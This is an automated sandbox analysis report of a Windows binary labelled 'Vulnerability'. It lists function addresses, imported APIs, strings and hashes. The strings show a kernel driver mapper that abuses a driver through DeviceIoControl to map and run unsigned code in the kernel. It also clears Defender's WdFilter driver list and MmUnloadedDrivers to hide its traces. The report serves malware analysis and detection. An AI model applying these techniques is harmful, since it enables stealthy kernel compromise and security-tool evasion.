Opcode ID: 47de42b5c40e8cd5d83652023a43dc839ef7cbf787f481b3bac40278a2451f8a
Instruction ID: 909196677cee11f524dd4b6088529a27ef509d769ea64cdce95be2c4ae204e30
Opcode Fuzzy Hash: 47de42b5c40e8cd5d83652023a43dc839ef7cbf787f481b3bac40278a2451f8a
Instruction Fuzzy Hash: 19324C63E78B4395EB80EB61E8401A9F3A1AB54788F804236ED4D27758DF3ED569C730

Function 00007FF7738E5010 Relevance: 60.1, APIs: 19, Strings: 15, Instructions: 570COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3310
Part of subcall function 00007FF7738F32C0: VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3362

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E50B2
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E50E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5145
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5269
DeviceIoControl.KERNEL32 ref: 00007FF7738E5304
DeviceIoControl.KERNEL32 ref: 00007FF7738E53CB
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E541A

Part of subcall function 00007FF7738E5E00: DeviceIoControl.KERNEL32 ref: 00007FF7738E5E9B

wcsstr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E544F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E54BA
DeviceIoControl.KERNEL32 ref: 00007FF7738E554A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E55A4
DeviceIoControl.KERNEL32 ref: 00007FF7738E5633
DeviceIoControl.KERNEL32 ref: 00007FF7738E56D4
DeviceIoControl.KERNEL32 ref: 00007FF7738E5753
DeviceIoControl.KERNEL32 ref: 00007FF7738E57DB
DeviceIoControl.KERNEL32 ref: 00007FF7738E5863
DeviceIoControl.KERNEL32 ref: 00007FF7738E58EB
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E592C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E5970

Part of subcall function 00007FF7738EAA30: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA6F
Part of subcall function 00007FF7738EAA30: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA97

Strings

xxx?xx?x???????????x, xrefs: 00007FF7738E521D
[!] Failed to find WdFilter RuntimeDriversList, xrefs: 00007FF7738E5128
WdFilter.sys, xrefs: 00007FF7738E5063
[+] Found WdFilter MpFreeDriverInfoEx with second pattern, xrefs: 00007FF7738E5253
[!] Failed to find WdFilter MpFreeDriverInfoEx, xrefs: 00007FF7738E5247
xxx?x?xx???????????x, xrefs: 00007FF7738E51DF
0, xrefs: 00007FF7738E58C4
[!] Failed to find WdFilter RuntimeDriversCount, xrefs: 00007FF7738E51B8
[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod, xrefs: 00007FF7738E590F
PAGE, xrefs: 00007FF7738E50F5, 00007FF7738E5185, 00007FF7738E51CF, 00007FF7738E520D
[+] WdFilter.sys not loaded, clear skipped, xrefs: 00007FF7738E50C3
xx????xxx, xrefs: 00007FF7738E5195
xxx????xx, xrefs: 00007FF7738E5105
[!] Failed to remove from RuntimeDriversArray, xrefs: 00007FF7738E5587
[+] WdFilterDriverList Cleaned: , xrefs: 00007FF7738E5941

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$ControlDevice$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$Virtual$FreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$AllocHandleModulememmovememsetwcsstr
String ID: 0$PAGE$WdFilter.sys$[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod$[!] Failed to find WdFilter MpFreeDriverInfoEx$[!] Failed to find WdFilter RuntimeDriversCount$[!] Failed to find WdFilter RuntimeDriversList$[!] Failed to remove from RuntimeDriversArray$[+] Found WdFilter MpFreeDriverInfoEx with second pattern$[+] WdFilter.sys not loaded, clear skipped$[+] WdFilterDriverList Cleaned: $xx????xxx$xxx????xx$xxx?x?xx???????????x$xxx?xx?x???????????x
API String ID: 3544830047-4286004192
Opcode ID: d81fbafa94d609a4140f4b32611b6c5fb154e0ffdcaa8da99f44757a7aaf20a5
Instruction ID: 651aa57d894949ea67e222c72a6a62799cf5f7e831e36f7032326e9d42cd770e
Opcode Fuzzy Hash: d81fbafa94d609a4140f4b32611b6c5fb154e0ffdcaa8da99f44757a7aaf20a5
Instruction Fuzzy Hash: FB426E73B38B429AE740EB61E4502ADB3B5EB48788F904635DA4D27B58DF3DD265C320

Function 00007FF7738E6810 Relevance: 42.3, APIs: 16, Strings: 8, Instructions: 338nativememoryCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00007FF7738E685E
VirtualFree.KERNEL32 ref: 00007FF7738E687B
VirtualAlloc.KERNEL32 ref: 00007FF7738E6890
NtQuerySystemInformation.NTDLL ref: 00007FF7738E68A9
GetCurrentProcessId.KERNEL32 ref: 00007FF7738E68F9
VirtualFree.KERNEL32 ref: 00007FF7738E693C
DeviceIoControl.KERNEL32 ref: 00007FF7738E69BB
DeviceIoControl.KERNEL32 ref: 00007FF7738E6A5B
DeviceIoControl.KERNEL32 ref: 00007FF7738E6AFB
DeviceIoControl.KERNEL32 ref: 00007FF7738E6B9B
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E6BF8
DeviceIoControl.KERNEL32 ref: 00007FF7738E6C83
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E6CC7
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E6CEE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E6D20
VirtualFree.KERNEL32 ref: 00007FF7738E6D53

Strings

[!] Failed to find device_object, xrefs: 00007FF7738E6D3A
[!] Failed to find driver name, xrefs: 00007FF7738E6D03
0, xrefs: 00007FF7738E6C5C
[+] MmUnloadedDrivers Cleaned: , xrefs: 00007FF7738E6C9C
[!] Failed to read driver name, xrefs: 00007FF7738E6C14
[!] Failed to find driver_object, xrefs: 00007FF7738E6D31
[!] Failed to write driver name length, xrefs: 00007FF7738E6CD1
[!] Failed to find driver_section, xrefs: 00007FF7738E6D28

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$ControlDevice$Virtual$??6?$basic_ostream@D@std@@@std@@FreeU?$char_traits@V01@@$InformationQuerySystem$AllocCurrentProcessmemset
String ID: 0$[!] Failed to find device_object$[!] Failed to find driver name$[!] Failed to find driver_object$[!] Failed to find driver_section$[!] Failed to read driver name$[!] Failed to write driver name length$[+] MmUnloadedDrivers Cleaned:
API String ID: 48251577-3329613743
Opcode ID: 051810a0883f8684cf0231ec4c9613ca774b12292568e887c4856809f456f53f
Instruction ID: ce768bbbbf60252da7c7154d03c1b03c91588a1f2f67162b7010475fcce04f53
Opcode Fuzzy Hash: 051810a0883f8684cf0231ec4c9613ca774b12292568e887c4856809f456f53f
Instruction Fuzzy Hash: FBF19C23B78B428AE7409B61E4402ACB3A4EB49B88F944635DE4D37B54DF3ED525C330

Function 00007FF7738F3B60 Relevance: 33.2, APIs: 22, Instructions: 224fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF7738F3C0D
GetLastError.KERNEL32 ref: 00007FF7738F3C17
FindFirstFileW.KERNEL32 ref: 00007FF7738F3C2E
GetLastError.KERNEL32 ref: 00007FF7738F3C3A
FindClose.KERNEL32 ref: 00007FF7738F3C48
__std_fs_open_handle.LIBCPMT ref: 00007FF7738F3CDB
CloseHandle.KERNEL32 ref: 00007FF7738F3CF1
CloseHandle.KERNEL32 ref: 00007FF7738F3E6E
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F3E78

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
String ID:
API String ID: 4293554670-0
Opcode ID: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
Instruction ID: 27900bea93ff24d10b12069eee396df90a91dd3be231a86b762a1e70fe69507b
Opcode Fuzzy Hash: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
Instruction Fuzzy Hash: 07917233B38A4342EAA4AB15E404675E390AFA47B4F940334D97D62BD4DF7FE4658630

Function 00007FF7738E6440 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 243memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF7738E6491
DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
VirtualAlloc.KERNEL32 ref: 00007FF7738E65FA
VirtualFree.KERNEL32 ref: 00007FF7738E662E
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738E66D3
VirtualFree.KERNEL32 ref: 00007FF7738E6738
VirtualFree.KERNEL32 ref: 00007FF7738E67AA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E67E5
VirtualFree.KERNEL32 ref: 00007FF7738E67F7

Strings

0, xrefs: 00007FF7738E6570
@, xrefs: 00007FF7738E6527

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Virtual$Free$ControlDevice$Alloc_invalid_parameter_noinfo_noreturn_stricmpmemset
String ID: 0$@
API String ID: 2904545761-1545510068
Opcode ID: e415704aab537d9934ef91362266595f5def0288391fa7a6341463efddda99e5
Instruction ID: 1026b9a22080c576891a4b5fee547ab740149f4ae8479badaafc4d2286f3d6ac
Opcode Fuzzy Hash: e415704aab537d9934ef91362266595f5def0288391fa7a6341463efddda99e5
Instruction Fuzzy Hash: C7A1B233B68B4186EB509B21E88036DE7A1FB88784F904335DA5D67B98DF3DE491C720

Function 00007FF7738F32C0 Relevance: 13.6, APIs: 9, Instructions: 141nativememoryCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
VirtualFree.KERNEL32 ref: 00007FF7738F3310
VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
VirtualFree.KERNEL32 ref: 00007FF7738F3362
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F3401
VirtualFree.KERNEL32 ref: 00007FF7738F345D
VirtualFree.KERNEL32 ref: 00007FF7738F3497
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F34D1

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Virtual$Free$InformationQuerySystem$Alloc_invalid_parameter_noinfo_noreturn_stricmp
String ID:
API String ID: 562193759-0
Opcode ID: ba5146eabd586182c5c624808a67abf76309a0430c83361b4ecf8e90a1d2cc8f
Instruction ID: b53cd4c8fe86a1e84006da3a5cdb21236482eb06e16de758c700afa959b78ef5
Opcode Fuzzy Hash: ba5146eabd586182c5c624808a67abf76309a0430c83361b4ecf8e90a1d2cc8f
Instruction Fuzzy Hash: 8551D763B3894342EAA0EB15E800339E261FFA5BE4F944330DA5D666D4DE3FD5918730

Function 00007FF7738F4B58 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7738F4B74
memset.VCRUNTIME140 ref: 00007FF7738F4B98
RtlCaptureContext.KERNEL32 ref: 00007FF7738F4BA1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7738F4BBB
RtlVirtualUnwind.KERNEL32 ref: 00007FF7738F4BFC
memset.VCRUNTIME140 ref: 00007FF7738F4C2F
IsDebuggerPresent.KERNEL32 ref: 00007FF7738F4C50
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7738F4C6D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7738F4C78

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
Instruction ID: 8334bd910c9e8225a4fa4e86557c84149a83352806d7ac7fe8b7516f5add3a33
Opcode Fuzzy Hash: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
Instruction Fuzzy Hash: E0312173624B8286EBA0AF60E8407E9F364F794744F84403ADA4D57B95EF3DD558C720

Function 00007FF7738EFBF0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 250COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EFF93

Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738EFF8C

Strings

gfffffff, xrefs: 00007FF7738EFC14
gfffffff, xrefs: 00007FF7738EFF0F

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID: gfffffff$gfffffff
API String ID: 1934640635-161084747
Opcode ID: 5313d45d66579e6ecaa239320235c4f9602ceac26ef8ae8d27debff3e56f2ea8
Instruction ID: 96237cb92c3c99433532880b39ccb325c0a76013e54546a4ca823dc423b6877f
Opcode Fuzzy Hash: 5313d45d66579e6ecaa239320235c4f9602ceac26ef8ae8d27debff3e56f2ea8
Instruction Fuzzy Hash: 30A1EEA3B25B8982DA40DF16E44426DB3A0F798B84F919232DB8C57745DF3DE5E0C310

Function 00007FF7738F4D6C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7738F4D98
GetCurrentThreadId.KERNEL32 ref: 00007FF7738F4DA6
GetCurrentProcessId.KERNEL32 ref: 00007FF7738F4DB2
QueryPerformanceCounter.KERNEL32 ref: 00007FF7738F4DC2

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
Instruction ID: f8b1b43dfc7ac2816f49fd7d6dbc42347204f89e00a9ef09828657414f2560ba
Opcode Fuzzy Hash: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
Instruction Fuzzy Hash: 49115122B25F028AEB40DF60E8442B8B3B4FB59758F440E35DA6D56754DF3CD1648350

Function 00007FF7738F38A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF7738F0785), ref: 00007FF7738F38CE
FormatMessageA.KERNEL32 ref: 00007FF7738F3901

Strings

!x-sys-default-locale, xrefs: 00007FF7738F38C1

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
Instruction ID: 6fb38f357999a434ca8ec1cbbdaa67eda00f0f489c2b00e50cb0bfd8bd9afb98
Opcode Fuzzy Hash: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
Instruction Fuzzy Hash: 0301C473B3878382E7919B11F40076AE7A1FBA4784F948135DA8967B94CF7ED514C720

Function 00007FF7738F4D00 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
Instruction ID: 0f2c94b6ef60238e55395b6d38918c32d45d9ce143d173e0e0de62d2f6541ef7
Opcode Fuzzy Hash: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
Instruction Fuzzy Hash: 56A00122A38813E5EA85BB00E850820E220ABA0340FA50572D41E624A09F3EA4648230

Function 00007FF7738EE020 Relevance: 73.9, APIs: 24, Strings: 18, Instructions: 377memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF7738EE0B0
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7738EE283
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE293
memmove.VCRUNTIME140 ref: 00007FF7738EE2A3
memmove.VCRUNTIME140 ref: 00007FF7738EE2D8
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738EE31A
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7738EE326
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE345
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE60D

Strings

[-] Failed to write local image to remote image, xrefs: 00007FF7738EE3C3
[-] Failed to fix cookie, xrefs: 00007FF7738EE379
[+] Image base has been allocated at 0x, xrefs: 00007FF7738EE26A
[-] WARNING: Failed to free memory!, xrefs: 00007FF7738EE4E0, 00007FF7738EE5A7
[-] Failed to call driver entry, xrefs: 00007FF7738EE44F
[+] DriverEntry returned 0x, xrefs: 00007FF7738EE50A
[+] Skipped 0x, xrefs: 00007FF7738EE2FD
[-] Failed to resolve imports, xrefs: 00007FF7738EE39D
[-] Image is not 64 bit, xrefs: 00007FF7738EE093
[-] Invalid format of PE image, xrefs: 00007FF7738EE5F0
ExAllocatePoolWithTag, xrefs: 00007FF7738EE16E
[-] Failed to allocate remote image in kernel, xrefs: 00007FF7738EE20E
[+] Memory has been released, xrefs: 00007FF7738EE4D3, 00007FF7738EE59E
[<] Calling DriverEntry 0x, xrefs: 00007FF7738EE3D5
[+] Freeing memory, xrefs: 00007FF7738EE483, 00007FF7738EE54E
[!] Failed to find ExAllocatePool, xrefs: 00007FF7738EE1EB
bytes of PE Header, xrefs: 00007FF7738EE32F
[-] Callback returns false, failed!, xrefs: 00007FF7738EE419

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@??6?$basic_ostream@_D@std@@@std@@U?$char_traits@U?$char_traits@_V01@@W@std@@@std@@$memmove$AllocV21@@Vios_base@1@Virtual
String ID: bytes of PE Header$ExAllocatePoolWithTag$[!] Failed to find ExAllocatePool$[+] DriverEntry returned 0x$[+] Freeing memory$[+] Image base has been allocated at 0x$[+] Memory has been released$[+] Skipped 0x$[-] Callback returns false, failed!$[-] Failed to allocate remote image in kernel$[-] Failed to call driver entry$[-] Failed to fix cookie$[-] Failed to resolve imports$[-] Failed to write local image to remote image$[-] Image is not 64 bit$[-] Invalid format of PE image$[-] WARNING: Failed to free memory!$[<] Calling DriverEntry 0x
API String ID: 3661745735-2368498643
Opcode ID: 149e5b350b02ac96e6b7ac2af94cf2f7a579598cd706d5a0c900d21a85f83d6a
Instruction ID: ab6f368a0fac17d32f80dcdfce46b5e45e46fde9de740bedd88f20e367dc52fb
Opcode Fuzzy Hash: 149e5b350b02ac96e6b7ac2af94cf2f7a579598cd706d5a0c900d21a85f83d6a
Instruction Fuzzy Hash: DC025862F78A0385EA90EB65E8401B9E361AF55B84FC04636DD0D6B695EF3EE524C330

Function 00007FF7738F2900 Relevance: 66.8, APIs: 21, Strings: 17, Instructions: 278registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7738E45E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4291

